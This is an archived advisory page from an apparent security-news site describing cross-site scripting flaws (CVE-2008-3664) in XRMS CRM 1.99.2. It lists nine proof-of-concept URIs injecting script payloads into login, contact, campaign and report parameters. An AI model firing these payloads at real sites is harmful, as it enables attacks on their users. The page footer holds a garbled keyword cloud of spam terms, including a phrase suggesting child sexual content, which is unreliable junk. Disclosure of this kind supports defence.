exploits , vulnerabilities , articles , XRMS CRM Multiple Input Validation Vulnerabilities

Title	XRMS CRM Multiple Input Validation Vulnerabilities
Published	2008-09-04-12:00AM
Updated	2008-09-04-04:24PM
Class	Input Validation Error
CVE	CVE-2008-3664
Remote	Yes
Local	No
Credit	Fabian Fingerle
Vulnerable	XRMS CRM XRMS 1.99.2
Not Vulnerable
Code	Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.The following example URIs are available to demonstrate the cross-site scripting issues:http://www.example.com/xrms/login.php?target="><script>alert(1);</script> http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script> http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script> http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script> http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script> http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script> http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script> http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script> http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:37:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.seks.c XDOMAIN.BL excessive exabyte.co DataLife news for c Crack Data emails ethics and cisco ios njfghj.com apache 1.3 www.zhangt WWW.BBC UR n...etup[u Joomla Inc news for c www.nmgcyw ways to un 200 /compo CMS is Fre www.saniya zapakmail my.kjxy.hn mambo Remo news for C news for c &a BF VIDIO Apche 2.0 news for c zeroboard. news for / naked kids Messenger www.gerlet CVE 2004 1 Www.Video www.ya-yi- free sexy www.zzdown www.horse Toenda ethereal+9 pune servi news for c Kareenakap vide sex eshop6167. http;//tra